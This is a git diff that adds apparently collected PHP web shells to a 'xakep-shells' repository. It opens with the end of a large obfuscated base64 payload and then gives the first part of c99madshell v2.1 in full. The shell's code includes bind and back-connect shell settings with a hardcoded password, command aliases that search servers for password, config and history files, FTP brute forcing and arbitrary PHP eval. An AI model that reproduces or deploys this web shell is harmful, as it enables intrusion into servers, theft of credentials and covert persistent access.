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')));
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/c99madshell_v2.1.php.php.txt b/xakep-shells/PHP/c99madshell_v2.1.php.php.txt
new file mode 100644
index 0000000..ae1cf72
--- /dev/null
+++ b/xakep-shells/PHP/c99madshell_v2.1.php.php.txt
@@ -0,0 +1,2517 @@
+<?
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+$shver = "2.1 madnet edition ADVANCED";
+if (empty($surl))
+{
+ $surl = $_SERVER['PHP_SELF'];
+}
+$surl = htmlspecialchars($surl);
+
+$timelimit = 0;
+$host_allow = array("*");
+$login_txt = "Admin area";
+$accessdeniedmess = "die like the rest";
+$gzipencode = TRUE;
+$c99sh_sourcesurl = ""; //Sources-server
+$filestealth = TRUE;
+$donated_html = "";
+$donated_act = array("");
+$curdir = "./";
+$tmpdir = "";
+$tmpdir_log = "./";
+
+$log_email = "user@host.gov";
+$sort_default = "0a";
+$sort_save = TRUE;
+
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"),
+  array("config.php",1) // example
+);
+
+$safemode_diskettes = array("a");
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$nixpwdperpage = 100;
+$bindport_pass = "c99mad";
+$bindport_port = "31373";
+$bc_port = "31373";
+$datapipe_localport = "8081";
+if (!$win)
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "ls -la"),
+  array("find all suid files", "find / -type f -perm -04000 -ls"),
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+  array("find all sgid files", "find / -type f -perm -02000 -ls"),
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+  array("find config.inc.php files", "find / -type f -name config.inc.php"),
+  array("find config* files", "find / -type f -name \"config*\""),
+  array("find config* files in current dir", "find . -type f -name \"config*\""),
+  array("find all writable folders and files", "find / -perm -2 -ls"),
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
+  array("find all service.pwd files", "find / -type f -name service.pwd"),
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+  array("find all .bash_history files", "find / -type f -name .bash_history"),
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+  array("list file attributes on a Linux second extended file system", "lsattr -va"),
+  array("show opened ports", "netstat -an | grep -i listen")
+ );
+}
+else
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "dir"),
+  array("show opened ports", "netstat -an")
+ );
+}
+
+$sess_cookie = "c99shvars";
+
+$usefsbuff = TRUE;
+$copy_unset = FALSE;
+
+$quicklaunch = array(
+ array("<b><hr>HOME</b>",$surl),
+ array("<b><=</b>","#\" onclick=\"history.back(1)"),
+ array("<b>=></b>","#\" onclick=\"history.go(1)"),
+ array("<b>UPDIR</b>","#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='%upd';document.todo.sort.value='%sort';document.todo.submit();"),
+ array("<b>Search</b>","#\" onclick=\"document.todo.act.value='search';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>Buffer</b>","#\" onclick=\"document.todo.act.value='fsbuff';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>Tools</b>","#\" onclick=\"document.todo.act.value='tools';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>Proc.</b>","#\" onclick=\"document.todo.act.value='processes';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>FTP brute</b>","#\" onclick=\"document.todo.act.value='ftpquickbrute';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>Sec.</b>","#\" onclick=\"document.todo.act.value='security';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>SQL</b>","#\" onclick=\"document.todo.act.value='sql';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>PHP-code</b>","#\" onclick=\"document.todo.act.value='eval';document.todo.d.value='%d';document.todo.submit();"),
+ array("<b>Self remove</b>","#\" onclick=\"document.todo.act.value='selfremove';document.todo.submit();"),
+ array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
+);
+
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+/////////////////////////////////////
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://securityprobe.net\">c99madshell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+
+if (isset($_POST['act'])) $act  = $_POST['act'];
+if (isset($_POST['d'])) $d    = urldecode($_POST['d']);
+if (isset($_POST['sort'])) $sort = $_POST['sort'];
+if (isset($_POST['f'])) $f    = $_POST['f'];
+if (isset($_POST['ft'])) $ft   = $_POST['ft'];
+if (isset($_POST['grep'])) $grep = $_POST['grep'];
+if (isset($_POST['processes_sort'])) $processes_sort = $_POST['processes_sort'];
+if (isset($_POST['pid'])) $pid  = $_POST['pid'];
+if (isset($_POST['sig'])) $sig  = $_POST['sig'];
+if (isset($_POST['base64'])) $base64  = $_POST['base64'];
+if (isset($_POST['fullhexdump'])) $fullhexdump  = $_POST['fullhexdump'];
+if (isset($_POST['c'])) $c  = $_POST['c'];
+if (isset($_POST['white'])) $white  = $_POST['white'];
+if (isset($_POST['nixpasswd'])) $nixpasswd  = $_POST['nixpasswd'];
+
+$lastdir = realpath(".");
+chdir($curdir);
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
